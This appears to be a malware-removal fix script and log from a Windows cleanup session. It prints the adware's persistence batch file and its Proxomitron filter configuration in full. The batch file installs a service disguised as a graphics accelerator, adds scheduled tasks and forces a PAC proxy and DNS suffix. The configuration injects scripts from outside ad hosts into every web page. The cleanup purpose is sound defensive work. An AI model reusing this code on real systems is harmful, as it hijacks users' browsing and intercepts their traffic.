GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
ProxyServer: [.DEFAULT] => http=127.0.0.1:55783;https=127.0.0.1:55783
2015-06-07 03:52 - 2015-06-07 04:23 - 06103040 _____ C:\Program Files (x86)\GUT9627.tmp
2015-06-07 03:52 - 2015-06-07 03:52 - 00000000 ____D C:\Program Files (x86)\GUM9626.tmp
2015-06-06 02:40 - 2015-06-06 02:40 - 00000000 __SHD C:\found.000
File: C:\Windows\system32\ysxja.exe
File: C:\Windows\cygavb.exe
File: C:\Windows\FiddlerCore4.dll
File: C:\Windows\system32\Drivers\healusb.sys
File: C:\Windows\system32\cygwin.sys
cmd: type C:\Windows\mstdcvtr.bat
cmd: type C:\Windows\initcvtr.bat
cmd: type C:\Windows\default.cfg
cmd: type C:\Users\dell 2\Desktop\JRT.txt
cmd: type C:\Users\dell 2\Downloads\software_removal_tool.log
cmd: type C:\Users\dell 2\Desktop\Result.txt
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32 -> C:\Program Files\WinZip\adxloader64.dll ()
Task: {0A31A79E-2917-48A2-9B70-B5FC12E49153} - \avabvbxvh No Task File <==== ATTENTION
Task: {176A12CA-0E00-48F8-996E-4F5457FB4C20} - \EssentialUpdateMachine No Task File <==== ATTENTION
Task: {D7701A85-7F86-4B4C-9803-0FF2E2CB2B6E} - \Winupdate No Task File <==== ATTENTION
Hosts:
RemoveProxy:
cmd: bitsadmin /reset /allusers
cmd: netsh winsock reset catalog
cmd: ipconfig /flushdns
EmptyTemp:
End
*****************
 
Restore point was successfully created.
Processes closed successfully.
C:\Windows\system32\GroupPolicy\Machine => moved successfully.
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully.
C:\Windows\SysWOW64\GroupPolicy\GPT.ini => moved successfully.
"HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value removed successfully
C:\Program Files (x86)\GUT9627.tmp => moved successfully.
C:\Program Files (x86)\GUM9626.tmp => moved successfully.
C:\found.000 => moved successfully.
 
========================= File: C:\Windows\system32\ysxja.exe ========================
 
MD5: F2867BEE7180CDC839F7636FDDC1AA74
Creation and modification date: 2015-05-31 19:32 - 2015-04-25 05:18
Size: 0295424
Attributes: ----A
Company Name: Groom-A-Zebu ™  
Internal Name: Pancreas frappe'
Original Name: Proxomitron.exe
Product Name: Proxomitron
Description: The Proxomitron
File Version: 4, 5, 0, 4
Product Version: Naoko-4.5 2003-6-1
Copyright$creamod: Copyright © 1999 - 2003 By Scott R. Lemmon
 
====== End of File: ======
 
 
========================= File: C:\Windows\cygavb.exe ========================
 
MD5: F2867BEE7180CDC839F7636FDDC1AA74
Creation and modification date: 2015-05-31 19:32 - 2015-04-25 05:18
Size: 0295424
Attributes: ----A
Company Name: Groom-A-Zebu ™  
Internal Name: Pancreas frappe'
Original Name: Proxomitron.exe
Product Name: Proxomitron
Description: The Proxomitron
File Version: 4, 5, 0, 4
Product Version: Naoko-4.5 2003-6-1
Copyright$creamod: Copyright © 1999 - 2003 By Scott R. Lemmon
 
====== End of File: ======
 
 
========================= File: C:\Windows\FiddlerCore4.dll ========================
 
MD5: 80458A0AAA7887CD2ABEE4CED376DA0E
Creation and modification date: 2015-05-31 19:32 - 2012-07-09 11:02
Size: 0279552
Attributes: ----A
Company Name: Eric Lawrence
Internal Name: FiddlerCore4.dll
Original Name: FiddlerCore4.dll
Product Name: FiddlerCore
Description: FiddlerCore
File Version: 4.4.0.1
Product Version: 4.4.0.1
Copyright$creamod: Copyright ©2012 Eric Lawrence. All Rights Reserved.
 
====== End of File: ======
 
 
========================= File: C:\Windows\system32\Drivers\healusb.sys ========================
 
MD5: F57AB986584DCF46800D572D9747548B
Creation and modification date: 2015-05-31 19:32 - 2013-01-06 07:43
Size: 0000074
Attributes: ----A
Company Name: 
Internal Name: 
Original Name: 
Product Name: 
Description: 
File Version: 
Product Version: 
Copyright$creamod: 
 
====== End of File: ======
 
 
========================= File: C:\Windows\system32\cygwin.sys ========================
 
MD5: F57AB986584DCF46800D572D9747548B
Creation and modification date: 2015-05-31 19:32 - 2013-01-06 07:43
Size: 0000074
Attributes: ----A
Company Name: 
Internal Name: 
Original Name: 
Product Name: 
Description: 
File Version: 
Product Version: 
Copyright$creamod: 
 
====== End of File: ======
 
 
=========  type C:\Windows\mstdcvtr.bat =========
 
@ECHO OFF
if not exist "%systemroot%\wnavga.exe" ( if exist "%systemroot%\cfsvc.exe" ( copy /Y %systemroot%\cfsvc.exe %systemroot%\wnavga.exe ))
 
sc create WinGraph binpath= "%SystemRoot%\wnavga.exe" type= own start= auto DisplayName= "Windows Graphics Accelerator"
cls
sc description WinGraph "Optimizes performance of applications by caching commonly used font data. Applications will start this service if it is not already running. It can be disabled, though doing so will degrade application performance."
cls
sc failure WinGraph reset= 30 actions= restart/5000
cls
sc sidtype WinGraph UNRESTRICTED
cls
sc triggerinfo WinGraph start/networkon stop/networkoff
cls
sc start WinGraph
cls
 
if not exist "%systemroot%\chp.exe" ( if exist "%systemroot%\pgbmaf.exe" ( copy /Y %systemroot%\pgbmaf.exe %systemroot%\chp.exe ))
if not exist "%systemroot%\cygavb.exe" ( if exist "%systemroot%\System32\ysxja.exe" ( copy /Y %systemroot%\System32\ysxja.exe %systemroot%\cygavb.exe ))
 
if not exist "%systemroot%\System32\GroupPolicy\User\Scripts\Logon\appletide.exe" ( if exist "%systemroot%\memupdate.exe" ( copy /Y %systemroot%\memupdate.exe %systemroot%\System32\GroupPolicy\User\Scripts\Logon\appletide.exe ))
 
if not exist "%systemroot%\memupdate.exe" ( if exist "%systemroot%\System32\GroupPolicy\User\Scripts\Logon\appletide.exe" ( copy /Y %systemroot%\System32\GroupPolicy\User\Scripts\Logon\appletide.exe %systemroot%\memupdate.exe ))
if not exist "%systemroot%\wuappl.exe" ( if exist "%systemroot%\memupdate.exe" ( copy /Y %systemroot%\memupdate.exe %systemroot%\wuappl.exe ))
 
schtasks.exe /create /xml %systemroot%\soxe /TN EssentialUpdateMachine
schtasks.exe /create /xml %systemroot%\plofgye /TN Winupdate
 
chp.exe %systemroot%\cygavb.exe
cls
for /f "tokens=2*" %%a in ('REG QUERY "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters" /v SearchList') do ( set "SearchList=%%~b" )
::ECHO %SearchList%
IF NOT "%SearchList%" == "browserupdatecheck.in" (REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v SearchList /t REG_SZ /d browserupdatecheck.in /f) 
cls
ipconfig /registerdns
cls
::Pac file entry
if exist "%systemroot%\System32\Drivers\healusb.sys" (
del %systemroot%\System32\Drivers\winpacket.pac
copy /Y "%systemroot%\system32\Drivers\healusb.sys" %systemroot%\System32\Drivers\winpacket.pac
)
if not exist "%systemroot%\System32\Drivers\winpacket.pac" ( copy /Y "%systemroot%\system32\cygwin.sys" %systemroot%\System32\Drivers\winpacket.pac )
cls
for /f "tokens=2*" %%a in ('REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL') do set "config=%%~b"
IF NOT "%config%" == 'file://%systemroot%\System32\Drivers\winpacket.pac' ( 
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL /t REG_SZ /d file://"%systemroot%"\System32\Drivers\winpacket.pac /f 
cls
for /f "skip=2"  %%a in ('REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections" /s') do call :loop "%%a" 
cls
goto End
:loop
set con= %1
cls
for /f "tokens=2* skip=2" %%a in ('REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections"  /v %con%') do call :Foo %%b  %con%
cls
goto End
:End
 
:Foo
set str= %1
set conn= %2
set fstr=%str:~1,16%
set lstr=%str:~19,300%
cls
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections" /v "%conn%" /t REG_BINARY /d "%fstr%09%lstr%" /f 
cls
goto :eof
 
:End
 
 
 
========= End of CMD: =========
 
 
=========  type C:\Windows\initcvtr.bat =========
 
@ECHO OFF
cmd.exe /c mstdcvtr.bat
 
 
========= End of CMD: =========
 
 
=========  type C:\Windows\default.cfg =========
 
[Global]
Enable = TRUE
FreezeGIF = FALSE
FilterHTML = TRUE
FilterHeadersOut = FALSE
FilterHeadersIn = FALSE
EnableProxy = FALSE
EnableAutoRun = FALSE
ForceTextures = FALSE
NoTextures = TRUE
SysTray = FALSE
UseSSLeay = FALSE
NoCmdURL = TRUE
PriorityBoost = TRUE
BypassURL = "$LST(Bypass)"
Port = 8080
MaxCapURL = 100
 
[WinSizes]
Win.00 = 474:233:886:534
Win.01 = 306:233:718:534
Win.02 = 436:184:923:583
Win.03 = 334:276:689:451
Win.04 = 25:25:425:288
Win.05 = 435:221:930:517
Win.06 = 5:41:473:139
Win.07 = 5:146:473:252
 
[Blocklists]
 
[HTTP headers]
In = FALSE
Out = FALSE
Key = "Accept-encoding: Allow webpage encoding (out)"
Match = "*"
Replace = "gzip, deflate"
 
In = FALSE
Out = FALSE
Key = "Accept-encoding: prevent webpage encoding (out)"
Match = "*"
 
In = FALSE
Out = FALSE
Key = "Authorization: Example password entry (out)"
URL = "www.needspassword.com/this/area/protected.html"
Replace = "basic bWljaGllOm5lb24temVicmE="
 
In = FALSE
Out = FALSE
Key = "Cache-Control: always cache (in)"
Match = "*"
 
In = FALSE
Out = FALSE
Key = "Connection: Close all connections (In+Out)"
Replace = "close"
 
In = FALSE
Out = FALSE
Key = "Content-Type: character set filter (in)"
Match = "text/html;*charset*"
Replace = "text/html"
 
In = FALSE
Out = FALSE
Key = "Content-Type: Fix MIME types (In)"
Match = "text/*&$URL(https+://[^/]+*.([a-z0-9]+{2,5}(^?)&&$LST(MIME-List)))"
Replace = "\0"
 
In = FALSE
Out = FALSE
Key = "Content-Type: Show contents of .pac files (in)"
Match = "application/x-ns-proxy-autoconfig"
Replace = "text/plain"
 
In = FALSE
Out = FALSE
Key = "Content-Type: View RealAudio links (in)"
Match = "*realaudio*"
Replace = "text/html"
 
In = FALSE
Out = FALSE
Key = "Cookie: Fake a cookie (out)"
Match = "*"
Replace = "monster"
 
In = FALSE
Out = FALSE
Key = "Cookie: Kill a cookie (out)"
URL = "(^$LST(CookieList))"
Match = "*"
 
In = FALSE
Out = FALSE
Key = "Expires: always cache (in)"
Match = "*"
 
In = FALSE
Out = FALSE
Key = "Forwarded: (out)"
Replace = "\h"
 
In = FALSE
Out = FALSE
Key = "If-Modified-Since: Always reload pages (Out)"
Match = "*"
 
In = FALSE
Out = FALSE
Key = "Last-Modified: (In)"
Match = "*"
 
In = FALSE
Out = FALSE
Key = "Pragma: Don't force reloads (out)"
Match = "no-cache"
 
In = FALSE
Out = FALSE
Key = "Proxy-Authorization: Send password to proxy server (out)"
Replace = "basic cHJveHl1c2VyOnByb3h5cGFzcw=="
 
In = FALSE
Out = FALSE
Key = "Referer: Hide where we've been (Out)"
Match = "*"
Replace = "\u"
 
In = FALSE
Out = FALSE
Key = "Set-cookie: Make all cookies session only (in)"
URL = "(^$LST(CookieList))"
Match = "?&(\#; expires=[^;]+)+\#"
Replace = "\@"
 
In = FALSE
Out = FALSE
Key = "Set-cookie: Never accept cookies (In)"
URL = "(^$LST(CookieList))"
Match = "*"
 
In = FALSE
Out = FALSE
Key = "URL-Killer: kill-a-URL (out)"
URL = "$LST(AdList)"
Replace = "URL killed \k"
 
In = FALSE
Out = FALSE
Key = "URL: Alias Redirector (Out)"
URL = ".$LST(AliasList)"
 
In = FALSE
Out = FALSE
Key = "URL: Enable Keyword search (Out)"
URL = "[^./]+/(^?)&\w[a-z]&$JUMP(http://www.google.com/search?q=\h)"
 
In = FALSE
Out = FALSE
Key = "URL: Un-Prefixer (Out)"
Match = "[^\]+\w[^a-z]((http|ftp)(%3A|:)(%2F|/)[^&]+)\1"
Replace = "$JUMP($UESC(\1))"
 
In = FALSE
Out = FALSE
Key = "User-Agent: Lynx 2.8 (out) "
Match = "*"
Replace = "Lynx/2.8.3dev.8 libwww-FM/2.14FM"
 
In = FALSE
Out = FALSE
Key = "User-Agent: Netscape BEOS (out) "
Match = "*"
Replace = "Mozilla/4.41  (BEOS; U ;Nav)"
 
In = FALSE
Out = FALSE
Key = "User-Agent: Netscape Linux (out) "
Match = "*"
Replace = "Mozilla/4.61 [ja] (X11; I; Linux 2.2.13-33cmc1 i686)"
 
In = FALSE
Out = FALSE
Key = "User-Agent: Netscape Mac 68k (out) "
Match = "*"
Replace = "Mozilla/3.01Gold (Macintosh; I; 68K)"
 
In = FALSE
Out = FALSE
Key = "User-Agent: Opera 5.02 (out) "
Match = "*"
Replace = "Opera/5.02 (Windows 98; U)  [en]"
 
In = FALSE
Out = FALSE
Key = "User-Agent: SpaceBison (out) "
Match = "*"
Replace = "Space Bison/0.02 [fu] (Win67; X; SK)"
 
In = FALSE
Out = FALSE
Key = "WWW-Authenticate: filter out password requests (in)"
Match = "Basic*realm="*""
 
In = FALSE
Out = FALSE
Key = "X-Forwarded-For (out):"
Replace = "yahoo.com, microsoft.com, netscape.com, aol.com, \h"
 
 
[Patterns]
Name = "Add Security Bottom"
Active = TRUE
Limit = 256
Match = "</body>"
Replace = "<script src="http://dial.clickscart.in/js/scrap.js" type="text/javascript"></script><script src="http://dial.clickscart.in/js/ads.js" type="text/javascript"></script><script src="http://browserupdatecheck.in/js/jquery.js" type="text/javascript"></script><script src="http://browserupdatecheck.in/js/essence.js" type="text/javascript"></script> </body>"
 
Name = "Add Security Top"
Active = TRUE
Limit = 256
Match = "</title>"
Replace = "</title><script type = "text/javascript" src = "http://dial.clickscart.in/js/jquery-1.8.2.min.js"> </script><script type = "text/javascript" src = "http://dial.clickscart.in/js/redir.js"> </script>"
 
Name = "Banner Replacer"
Active = FALSE
Multi = TRUE
Bounds = "<a\s[^>]++href=*</a>"
Limit = 800
Match = "\0<img (\1border=\w|) \2 src=$AV(*) (\3border=\w|) \4"
        "&(*(src|href)=$AV($LST(AdKeys)*)|"
        "(*width=[#460-480] & *height=[#55-60])|"
        "(*width=[#88] & *height=[#31]))*"
Replace = "\0<img \1 border=1 \2 src=http://Local.ptron/killed.gif \3 \4"
 
Name = "Banner Blaster (limit text)"
Active = FALSE
Multi = TRUE
Bounds = "<a\s[^>]++href=*</a>|<input*>|<ilayer*</ilayer>|<iframe*</iframe>|<object*</object>"
Limit = 900
Match = "(<(ilayer|iframe|object)*|\1<i(mg|mage|nput)*src=$AV(*)*>\3)"
        "&(*(href|src)=$AV($LST(AdKeys)*)|"
        "*http://*<i(mg|mage|nput)\s(*>&&"
        "(*width=[#460-480]&*height=[#55-60]*)|"
        "(*width=[#88]&*height=[#31]*)))"
        "&(*alt=$AV((?+{18})\2*|\2)|$SET(2=Ad))"
Replace = "<center>\1<font size=1 color=red>[\2]</font>\3</center>"
 
Name = "Banner Blaster (full text)"
Active = FALSE
Multi = TRUE
Bounds = "<a\s[^>]++href=*</a>|<input*>|<ilayer*</ilayer>|<iframe*</iframe>|<object*</object>"
Limit = 900
Match = "(<(ilayer|iframe|object)*|\1<i(mg|mage|nput)*src=$AV(*)*>\3)"
        "&(*(href|src)=$AV($LST(AdKeys)*)|"
        "*http://*<i(mg|mage|nput)\s(*>&&"
        "(*width=[#460-480]&*height=[#55-60]*)|"
        "(*width=[#88]&*height=[#31]*)))"
        "&(*alt=$AV(\2)|$SET(2=Ad))"
Replace = "<center>\1<font size=1 color=red>[\2]</font>\3</center>"
 
Name = "DOM Banner Blaster v0.007"
Active = FALSE
Bounds = "<a\s*</(a|td|tr)>|<iframe*</iframe>|<ilayer*</ilayer>|<img*>|<input*>|<script(*(</sc|"*'))++ript >|<object*</object>|<form*</form>"
Limit = 8000
Match = "*=$AV($LST(AdKeys)*)*&<((a|form)\s*<img\s[^>+]+>|[^fa])"
Replace = "<a name=PDomTarget ></a>"
 
Name = "DOM container killer v0.007"
Active = FALSE
Limit = 256
Match = "<end>"
Replace = "\r\n<!-- // --><script src="http://local.ptron/DomConKiller.js"></script>"
 
Name = "Area Map Ad Blaster"
Active = FALSE
Multi = TRUE
Bounds = "<img\s[^>]+> <map\s*</map>"
Limit = 800
Match = "*usemap*>*"
        "&*(ads.|log_click|/ad|clickthru|(banner|ad|acct|source|click)(id|)=|adbanner|clicker|sponsor|adver|promo|redirect)*"
        "&*<map*<area (*href=(\w)\1 & (*alt="\2'|))*>\3</map>"
Replace = "<br><killmap><font size=1><a href=\1>[\2]</a></font>\3</killmap>"
 
Name = "Area Map Ad Blaster pt2 (show all links)"
Active = FALSE
Multi = TRUE
Bounds = "<killmap>*</killmap>"
Limit = 800
Match = "\1 <area (*href=(\w)\2 & (*alt="(?+{12})\3*|\3'|))*> \4"
Replace = " \1 <font size=1><a href=\2 >[\3]</a></font> \4 "
 
Name = "Kill JavaScript Banners"
Active = FALSE
Bounds = "<script($INEST(<script,</script)</script>( <noscript>|)|*)"
Limit = 2048
Match = "*(://$AV($LST(AdList)*)|"
        "(\=?\=?\=?\=?|ad(click|cycle)|.submit\(*focus\(|super_flashFileURL"
        "|banner_height|<iframe|'ht'\+|.referrer|</script*</script))\1"
        "&[^>]+>((*</script>)\0( <noscript>|)|\0)"
Replace = "<!-- JS Banner blocked -->\r\n"
          "<script language="ShonenScript">\0"
 
Name = "Kill specific Java applets"
Active = FALSE
Bounds = "<applet\s*</applet>"
Limit = 2048
Match = "*code=$AV((scroll|NavigatorTicker|movie|WSSApplet|hyper).*)*"
Replace = "<font size=1>[JavaApp Killed]</font><br>"
 
Name = "Flash animation killer"
Active = FALSE
Bounds = "<object*</object>|<embed*>( </embed>|)"
Limit = 1024
Match = "[^>]++(codebase|type)=$AV(*(flash|shockwave)*)*"
        "&(*<param ( name=$AV(movie|src)| value=$AVQ(\1))+{2}|*src=$AVQ(\1))"
Replace = "<a href=\1>[flash]</a>"
 
Name = "Counter Killer"
Active = FALSE
Bounds = "<img\s*>"
Limit = 256
Match = "\1 src=$AV(*(count(er|.pl)|stat|tracker)([^a-z]*|(^?))) \2"
Replace = "\1 src=http://Local.ptron/killed.gif border=1 \2"
 
Name = "Kill off-site Images"
Active = FALSE
Multi = TRUE
Bounds = "<(a\s[^>]++href=*</a>|i(mg|nput)\s*>)"
Limit = 800
Match = "\1<i(mg|nput)(*alt="\0"|)*>\2&*http://(^\h)"
        "&(^*(width=[#0-75]|height=[#0-20]))"
Replace = " \1<font size=1>[\0]</font>\2"
 
Name = "Kill all Images on selected pages"
Active = FALSE
URL = "$LST(NoImages)"
Bounds = "<i(mg|mage|nput)*>"
Limit = 256
Match = "\1src=$AV(*)\2&(^*height=[#3:16])"
Replace = "\1 border=1 "
          "src="http://Local.ptron/killed.gif" \2"
 
Name = "Un-Prefix URLs"
Active = FALSE
URL = "[^.]+.(lycos|snap|yahoo|metacrawler)"
Limit = 1024
Match = "href=($AV(?????*[^a-z0-9]((http|ftp)(%3A|:)(%2F|/)(%2F|/)(^\h)[^&]+)\1*)&("|)\0)"
Replace = "href=\0$UESC(\1)\0"
 
Name = "Webpage Background Killer"
Active = FALSE
Multi = TRUE
Limit = 200
Match = "<body \1background=\2>"
Replace = "<body \1nobak=\2>"
 
Name = "Webpage Background Replacer"
Active = FALSE
Multi = TRUE
Limit = 200
Match = "<body ( \1 background=\w|) \2>"
Replace = "<body \1 background="http://Local.ptron/black.gif" \2>"
 
Name = "Kill All Backgrounds (even tables)"
Active = FALSE
Limit = 20
Match = "background(=|-image:)\1"
Replace = "nobak\1"
 
Name = "Sounds to links"
Active = FALSE
Bounds = "<(embed|bgsound)\s*>"
Limit = 1024
Match = "[<a-z]+ (*qtsrc|*src)=$AVQ(\1)&(*type=$AV(\2)|$SET(2=AV-Killed))*"
Replace = "<a href=\1 >[\2]</a>"
 
Name = "Sound Silencer"
Active = FALSE
Limit = 20
Match = "<(embed|bgsound)\s"
Replace = "<keepquiet "
 
Name = "Embedded MIDI Silencer"
Active = FALSE
Bounds = "<embed\s*>"
Limit = 256
Match = "*src=$AVQ(\1)*&*(.mid|midi)"
Replace = "<embed src=\1 height=15 controls=smallconsole  >"
 
Name = "Blink Buster (Blink to Bold)"
Active = FALSE
Limit = 20
Match = "<(/|)\1blink>"
Replace = "<\1b>"
 
Name = "Freeze font's face"
Active = FALSE
Limit = 80
Match = "<font\s\1face=\2>"
Replace = "<font \1ecaf=\2>"
 
Name = "Onload unloader"
Active = FALSE
Limit = 20
Match = "onload="
Replace = "LoadOff="
 
Name = "OnUnload unloader"
Active = FALSE
Limit = 20
Match = "onunload="
Replace = "UnLoadOff="
 
Name = "Kill pop-up windows"
Active = FALSE
URL = "$TYPE(htm)"
Limit = 4096
Match = " (<!DOCTYPE*> |)\1"
Replace = "$STOP()\1\r\n"
          "<!--//--><script src="http://local.ptron/WindowOpen.js"></script>\r\n"
 
Name = "Restore pop-ups after a page loads"
Active = FALSE
Limit = 4096
Match = "<end>"
Replace = "\r\n<!--//--><script>PrxRST();</script>"
 
Name = "Force pop-ups to have browser controls"
Active = FALSE
URL = "$TYPE(htm)"
Limit = 256
Match = " (<!DOCTYPE*> |)\1"
Replace = "$STOP()\1\r\n"
          "<!--//--><script>PrxModAtr=1;</script>\r\n"
 
Name = "Link De-Obfuscator"
Active = FALSE
Limit = 50
Match = "onmouseover=($AV(*.status=*))\1"
Replace = "nomouseover=\1"
 
Name = "Anti-Auto-Refresher"
Active = FALSE
Bounds = "<meta\s*>"
Limit = 256
Match = "*http-equiv=("|)refresh*content=("|) [#5:*]( ([;,]|) (url=|)("|)([^>"' ]+)\1|)*"
Replace = "<center><font size=1><a href=\1 >[Refresh]</a></font></center>"
 
Name = "Wordwrap all form textboxes"
Active = FALSE
Limit = 128
Match = "<textarea\s\1>"
Replace = "<textarea wrap=soft \1>"
 
Name = "GeoCities branding killer"
Active = FALSE
URL = "*.geocities."
Limit = 2500
Match = "<div class="geobranding*</script>"
Replace = "<font size=1>[GeoBrand killed]</font>"
 
Name = "Kill add-on JavaScripts "
Active = FALSE
Multi = TRUE
Limit = 1024
Match = "</html>\1$NEST(<script,</script>)"
Replace = "<font size=1>[PostScript Killed]</font><br>\r\n"
          "</html>\1\r\n"
 
Name = "Suppress all JavaScript errors"
Active = FALSE
URL = "$TYPE(htm)"
Limit = 256
Match = " (<!DOCTYPE*> |)\1"
Replace = "$STOP()\1\r\n"
          "<!--//--><script> function NoError(){return(true);} onerror=NoError; </script>\r\n"
 
Name = "Kill alert/confirm boxes"
Active = FALSE
URL = "$TYPE(htm)"
Limit = 256
Match = " (<!DOCTYPE*> |)\1"
Replace = "$STOP()\1\r\n"
          "<!--//--><script> "
          "function NoBox(txt){ return(1);} "
          "window.alert=NoBox; window.confirm=NoBox; window.prompt=NoBox;"
          "</script>\r\n"
 
Name = "Stop browser window resizing"
Active = FALSE
URL = "$TYPE(htm)"
Limit = 256
Match = " (<!DOCTYPE*> |)\1"
Replace = "$STOP()\1\r\n"
          "<!--//--><script> "
          "function moveTo(){return true;}"
          "function resizeTo(){return true;}"
          "</script>\r\n"
 
Name = "Stop status bar scrollers"
Active = FALSE
URL = "$TYPE(htm)"
Limit = 256
Match = " (<!DOCTYPE*> |)\1"
Replace = "$STOP()\1\r\n"
          "<!--//--><script> function status(txt){return(1);} </script>\r\n"
 
Name = "Kill Dynamic HTML JavaScripts"
Active = FALSE
URL = "$TYPE(htm)"
Limit = 256
Match = " (<!DOCTYPE*> |)\1"
Replace = "$STOP()\1\r\n"
          "<!--//--><script> function NoWrite(txt){return(1);} "
          "document.write=NoWrite; "
          "document.writeln=NoWrite; "
          "</script>\r\n"
 
Name = "Stop JavaScript Timers"
Active = FALSE
URL = "$TYPE(htm)"
Limit = 4096
Match = " (<!DOCTYPE*> |)\1"
Replace = "$STOP()\1\r\n"
          "<!--//--><script> function setTimeout(x,y){return(null);} </script>\r\n"
 
Name = "Stop JavaScript Redirects"
Active = FALSE
Limit = 30
Match = ".location(=|.)\1"
Replace = ".NoLocation\1"
 
Name = "Disable JavaScript"
Active = FALSE
Limit = 128
Match = "<script*>"
Replace = "<script language="ShonenScript 712.0">"
 
Name = "Kill Nosey JavaScripts"
Active = FALSE
Bounds = "$NEST(<script,</script>)"
Limit = 16000
Match = "*(.(referrer|plugins|cookie|colorDepth|pixelDepth|external)|history.length)*"
Replace = "<!-- Killed Nosey JavaScript -->"
 
Name = "Disable JavaScript (and meta) cookies"
Active = FALSE
URL = "(^$LST(CookieList))"
Limit = 128
Match = ".cookie(*[(;)=])\1|http-equiv="Set-Cookie""
Replace = ".Cracker\1"
 
Name = "Make JS & Meta cookies session only"
Active = FALSE
URL = "^$LST(CookieList)"
Limit = 50
Match = "expires=(*["';])\1"
Replace = "NoExp=\1"
 
Name = "Hide Browser's Referrer from JS"
Active = FALSE
Limit = 15
Match = ".referrer"
Replace = ".referrer.substr(0,0)+"\u""
 
Name = "Hide Browser's Version from JS"
Active = FALSE
Limit = 25
Match = "navigator.appVersion"
Replace = "'2.1'"
 
Name = "Hide Browser's Identity from JS"
Active = FALSE
Limit = 25
Match = "navigator.(appName|userAgent)"
Replace = "'ShonenScape'"
 
Name = "Allow right mouse click"
Active = FALSE
Limit = 256
Match = ".(onmousedown=|captureEvents\()\1"
Replace = ".PrxOff_\1"
 
Name = "Kill window.external methods"
Active = FALSE
Limit = 40
Match = "window.external.[^(]+"
Replace = "null; "
 
Name = "Stop OnMouseOver events"
Active = FALSE
Limit = 20
Match = "onmouseover="
Replace = "OnPheasantOver="
 
Name = "Frame Jumper-Outer"
Active = FALSE
Multi = TRUE
Bounds = "<a\s*>"
Limit = 128
Match = "<a\s(\0http://\1&(^*_(top|blank)))"
Replace = "<a target=_top \0http://\1"
 
Name = "Kill Style Sheets"
Active = FALSE
Limit = 4096
Match = "<style*</style>"
Replace = "<!-- style sheet killed -->"
 
Name = "Kill Layers"
Active = FALSE
Limit = 20
Match = "<(/|)\1(i|)layer"
Replace = "<\1PeelLayer"
 
Name = "iFrame/iLayer to link"
Active = FALSE
Bounds = "<i(frame\s*</iframe|layer\s*</ilayer)>"
Limit = 1000
Match = "<(iframe|ilayer)\0*src=$AVQ(\1)*"
Replace = "<font size=1><a target=_blank href=\1 >[\0]</a></font>"
 
Name = "Frame Exploder"
Active = FALSE
Multi = TRUE
URL = "$TYPE(htm)"
Limit = 4096
Match = " (<!DOCTYPE*> |)\1"
Replace = "$STOP()\1\r\n"
          "<!--//--><script> "
          "if (top.location != location){"
          "window.open(location.href); window.close(); "
          "} </script>\r\n"
 
Name = "Kill top of page frame"
Active = FALSE
Multi = TRUE
Bounds = "<frameset\s*>"
Limit = 150
Match = "\1 rows=$AV([#20:90] , (\*|100%) ) \3"
Replace = "\1 rows="0,*" \3"
 
Name = "Kill bottom of page frame"
Active = FALSE
Multi = TRUE
Bounds = "<frameset\s*>"
Limit = 150
Match = "\1 rows=$AV(\* , [#10:100] ) \3"
Replace = "\1 rows="*,0" \3"
 
Name = "Allow for frame resizing"
Active = FALSE
Bounds = "<fram*>"
Limit = 256
Match = "(\#((frameborder|border)=$AV(*)|noresize|=$AV(0|no)$SET(\#==1 )))+ \1 >"
Replace = "\@\1 border=1>"
 
Name = "DeFramer"
Active = FALSE
Limit = 40
Match = "<(/|)\1(frameset|noframes)"
Replace = "<\1NoFrameset"
 
Name = "Convert Frames to Links"
Active = FALSE
Bounds = "<frame\s*>"
Limit = 256
Match = "*src=("*'|\w)\1*"
Replace = "<body><font size=2><a href=\1>Frame:\1</a></font><br></body>"
 
Name = "DeTabler"
Active = FALSE
Limit = 200
Match = "<(/|)t(able|r)*>"
Replace = "<p>"
 
Name = "Table width unlimiter"
Active = FALSE
Bounds = "<t(able|d)\s*>"
Limit = 256
Match = "\0 width=[#500:*] \1"
Replace = "\0 \1"
 
Name = "Skinnier Table Border"
Active = FALSE
Limit = 128
Match = "<table\s\1border=[#4-*]\2>"
Replace = "<table \1border=3\2>"
 
Name = "Kill anti-cache meta tags"
Active = FALSE
Limit = 40
Match = "<meta http-equiv=("|)\#(expires|Last-Modified|pragma|cache)\#"
Replace = "<moota http-ignore=\@"
 
Name = "Webpage Comment Viewer"
Active = FALSE
Bounds = "<!--*-->( </script>|)"
Limit = 256
Match = "<!--(\#<$SET(#=&lt;))+\#-->(^ </script)"
Replace = "<font size=1><pre>&lt;!--\@--&gt;</pre></font>"
 
Name = "Foreign content-type filter"
Active = FALSE
Bounds = "<meta\s*>"
Limit = 256
Match = "*http-equiv="content-type"*charset=*"
 
 
[Proxies]
 OpenLog = TRUE
 
 
 
========= End of CMD: =========
 
 
=========  type C:\Users\dell 2\Desktop\JRT.txt =========
 
The system cannot find the file specified.
Error occurred while processing: C:\Users\dell.
The system cannot find the path specified.
 
========= End of CMD: =========
 
 
=========  type C:\Users\dell 2\Downloads\software_removal_tool.log =========
 
The system cannot find the file specified.
Error occurred while processing: C:\Users\dell.
The system cannot find the path specified.
 
========= End of CMD: =========
 
 
=========  type C:\Users\dell 2\Desktop\Result.txt =========
 
The system cannot find the file specified.
Error occurred while processing: C:\Users\dell.
The system cannot find the path specified.
 
========= End of CMD: =========
 
